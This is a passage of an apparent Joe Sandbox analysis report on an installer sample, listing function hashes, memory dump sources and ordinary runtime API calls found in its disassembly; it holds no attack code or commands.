                        • Instruction ID: f8566c3c243f19105b40a00891ac95123f65a6e140429061fb0ccd6648087ca5
                        • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                        • Instruction Fuzzy Hash: 7EC1B3352087818BD718CE3DE1A0697BBE2EFDA354F148A6DC4CA8BF55DA30A40DCB55
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                        • Instruction ID: b357e3d2b8f55c9e1277e6c7a2fae12423986f27ae76de6599afbc76bf77c8cb
                        • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                        • Instruction Fuzzy Hash: 97B1B231304B854BD324EF79C9907EABBE1EF84308F04492DC5AA87B51DF35A909C7A6
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                        • Instruction ID: de8d16897222dc32c46827f0fdc916f8c68cc410f50527e6b97db0d84d542bf9
                        • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                        • Instruction Fuzzy Hash: 1BB19C757047428BC314DF29C8806ABFBE2FFC8304F14892DD49A87715E771A95ACB9A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                        • Instruction ID: ce53bcafba418c1da706516579d2e845b8c5806590d63eb4a8ef622389457d83
                        • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                        • Instruction Fuzzy Hash: 71A1C47160C7818FC319CE29C49069BBBE1EFD5308F584A2DE4D6A7B41D7B1E94ACB42
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                        • Instruction ID: a8c0efafc5dee70572c4f028b0346dd03644e7a9a42d74a5420c0677ac8e8cdf
                        • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                        • Instruction Fuzzy Hash: 5981C335A087418FC320CF29C480656F7E1FF99714F28CA6DC5999BB15E772E946CB81
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                        • Instruction ID: cefcb554217828a52947c351766e1a4443ad67385c0e4820380dbc0c93d34b5d
                        • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                        • Instruction Fuzzy Hash: D5518D72F006099FDB08CED8D9916ADB7F2EB88308F24816DD111E7781D7749A92CB90
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                        • Instruction ID: 123c5055643bc697f4596204bfec40ac52f04648b3f8c4e2ba43a8f53bead925
                        • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                        • Instruction Fuzzy Hash: FF3114677A444107C70CCD3BCE1279F91679BD462AB0ECF396C05EEF55D92CC8524144
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                        • Instruction ID: 9ba46151d50c488462d2f3dd86bd258e56ad09e6456f70683daa0e05a7619f46
                        • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                        • Instruction Fuzzy Hash: 54219077320A0647E74C8A38D93737532D1A705318F98A22DEA6BCE2C2D77AC457C385
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07ac7ca2a7d87ff4c7dc66bccc711cb0bc82b57c5cf9215ba22a1ab42b21b0b6
                        • Instruction ID: 124347bfd428d1af6b173392a10a121c348be8186040c4d9bc4e49345ca33e80
                        • Opcode Fuzzy Hash: 07ac7ca2a7d87ff4c7dc66bccc711cb0bc82b57c5cf9215ba22a1ab42b21b0b6
                        • Instruction Fuzzy Hash: 68F06572A15224EBCB22CB4DC946B9973BCFB45B65F15009BE541EB640C7B0DD80C7E1
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                        • Instruction ID: 94cc83465abc3f2677d728313cf500df15d640e92fe7a5e48132044849ad02c3
                        • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                        • Instruction Fuzzy Hash: BBE08C72A12228EBCB20CBC8CA00D8AB3ECFB84A14B250097B511E3600D270DE44C7E0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                        • Instruction ID: dea7d5a4ef30c9f9eb59f399b3263700d5234a7b205948bb5b61f8ece4f06127
                        • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                        • Instruction Fuzzy Hash: 08C080B311810057C302D92594C079AF6637360330F228C2D9051E7E43C314C0644111
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                        • API String ID: 3519838083-609671
                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                        • Instruction ID: 5d1f934e6f2aef33fec2fec1ffb772dbc6400228c87c9afc0a87f67c7becc591
                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                        • Instruction Fuzzy Hash: FFD1B471B04209EFCB05DFA8DA80BEEB7B5FF4530CF244519E055A3A50DB709989CB66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv$H_prolog
                        • String ID: >WJ$x$x
                        • API String ID: 2300968129-3162267903
                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                        • Instruction ID: ae09c185096d1bd8e5878f9b28530974c2ed5ed8c8e1873ba68ecb4e5af108c4
                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                        • Instruction Fuzzy Hash: 83125971900259EFDF10CFA8C980AEDBBB9BF48318F24816DE919BB650D7359989CF50
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 6CA68927
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA6892F
                        • _ValidateLocalCookies.LIBCMT ref: 6CA689B8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA689E3
                        • _ValidateLocalCookies.LIBCMT ref: 6CA68A38
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 10f49665c0fbfc781206fccaf57ef758478e3c03634f91e989df473556dae74f
                        • Instruction ID: f1e08c09089d0093895bb87fb6cd2e1a9629150dba0a378cb9b51984e2d3f319
                        • Opcode Fuzzy Hash: 10f49665c0fbfc781206fccaf57ef758478e3c03634f91e989df473556dae74f
                        • Instruction Fuzzy Hash: 5A41E735A012189FCF00CF6AC844ADE7BB9BF4631CF188556DC159BB51D731DA89CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 0-537541572
                        • Opcode ID: 775ba355e765b04ea21de46941415ac1a25951a3465a9f405693798be2f7f3b6
                        • Instruction ID: 28c01feec9d6cad0a84a575e5eec66f10f65f4a2def3b9e3dd04125e9d016104
                        • Opcode Fuzzy Hash: 775ba355e765b04ea21de46941415ac1a25951a3465a9f405693798be2f7f3b6
                        • Instruction Fuzzy Hash: 3B21D839E05311ABDB31CA69CD4DA5A3778FF027A8F290751ED15AB682EA30DD81C5F0
                        APIs
                        • GetConsoleCP.KERNEL32(?,6CA79EF0,?), ref: 6CA7AD19
                        • __fassign.LIBCMT ref: 6CA7AEF8
                        • __fassign.LIBCMT ref: 6CA7AF15
                        • WriteFile.KERNEL32(?,6CA848D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7AF5D
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA7AF9D
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7B049
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ConsoleErrorLast
                        • String ID:
                        • API String ID: 4031098158-0
                        • Opcode ID: d294b22315d1d7abe380985b6849e571ac1d01bb456f7d29c914fda6198c2ab3
                        • Instruction ID: b9425572c12aaa897f53b7160407649572034339457fb112b9c7438663f066e9
                        • Opcode Fuzzy Hash: d294b22315d1d7abe380985b6849e571ac1d01bb456f7d29c914fda6198c2ab3
                        • Instruction Fuzzy Hash: B1D1BCB5E012589FCF25CFA8C9809EDBBB5BF09314F280169E855EB641D7319D8ACB60
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C932F95
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C932FAF
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C932FD0
                        • __Getctype.LIBCPMT ref: 6C933084
                        • std::_Facet_Register.LIBCPMT ref: 6C93309C
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C9330B7
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                        • String ID:
                        • API String ID: 1102183713-0
                        • Opcode ID: 3c306ab6055b67433ea1432d987404693a0346a2aecf01d3462e4605136cec20
                        • Instruction ID: 1ffb7d5b24cccb8184ac1ff4503fda9a1cc74c4e6344a4519842886a19918078
                        • Opcode Fuzzy Hash: 3c306ab6055b67433ea1432d987404693a0346a2aecf01d3462e4605136cec20
                        • Instruction Fuzzy Hash: 914188B1E00628CFDB04CF96C958BAEBBB4FF54718F044119D859ABB91D734E948CB91
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv$__aullrem
                        • String ID:
                        • API String ID: 2022606265-0
                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                        • Instruction ID: af58dfe1eb9dd22ef1d503fdbd1455b26fa18dcaa43fe67f172d0b8ba4cf69c7
                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                        • Instruction Fuzzy Hash: 57210330502669BBDF108EDACC40DDF7E6DEB417A8F208225B52463690D2718D95C7A0
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAA86F1
                          • Part of subcall function 6CAB7173: __EH_prolog.LIBCMT ref: 6CAB7178
                        • __EH_prolog.LIBCMT ref: 6CAA88F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: IJ$WIJ$J
                        • API String ID: 3519838083-740443243
                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                        • Instruction ID: cc7c3d156bdb889cf7b86836bf6b951c54831e5ba12f77e564327eadbae49892
                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                        • Instruction Fuzzy Hash: 2671B230900694DFDB18DFA4C544BEDB7F0BF18308F1484AAD8596BB91DB74AA8DCB91
                        APIs
                        • _free.LIBCMT ref: 6CA848FD
                        • _free.LIBCMT ref: 6CA84926
                        • SetEndOfFile.KERNEL32(00000000,6CA8350C,00000000,6CA79EF0,?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000), ref: 6CA84958
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000,?,?,?,?,00000000,?), ref: 6CA84974
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _free$ErrorFileLast
                        • String ID: 8Q
                        • API String ID: 1547350101-4022487301
                        • Opcode ID: 68b92373f13a2df6e65a5876fd3e9bbec60769e3934171dc497252a333f80af9
                        • Instruction ID: 8d732a8a2ec5589352735e3b9f7b31943e476f353f7aee8e6ad0a18bbc0d94a9
                        • Opcode Fuzzy Hash: 68b92373f13a2df6e65a5876fd3e9bbec60769e3934171dc497252a333f80af9
                        • Instruction Fuzzy Hash: A3411736A022459BDB219FF9CD54BCE7B7DAF45328F290211E424A7B90DB34C4CD8765
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CABC41D
                          • Part of subcall function 6CABCE40: __EH_prolog.LIBCMT ref: 6CABCE45
                          • Part of subcall function 6CABC8EB: __EH_prolog.LIBCMT ref: 6CABC8F0
                          • Part of subcall function 6CABC593: __EH_prolog.LIBCMT ref: 6CABC598
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: &qB$0aJ$A0$XqB
                        • API String ID: 3519838083-1326096578
                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                        • Instruction ID: ef39258fd115e93d06a637f950606b7b9b0bd14ddf34d308d8273d1a9c75dee8
                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                        • Instruction Fuzzy Hash: 51217771D01258EECF09DBE4DA859EDBBF4AF25308F20406AE41677781DB781A8CCB21
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: J$0J$DJ$`J
                        • API String ID: 3519838083-2453737217
                        • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                        • Instruction ID: eb4d603d84d5015b9067a732de398528e2a619cc17636336d2219022b7cfa4c7
                        • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                        • Instruction Fuzzy Hash: 6511E0B0900B64CEC720DF5AC55059AFBE8BFA5708B00C90FC0AA97B10C7F8A548CB59
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA6DFD4,00000000,?,6CA6E055,6CA68A69,00000003,00000000), ref: 6CA6DF5F
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA6DF72
                        • FreeLibrary.KERNEL32(00000000,?,?,6CA6DFD4,00000000,?,6CA6E055,6CA68A69,00000003,00000000), ref: 6CA6DF95
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
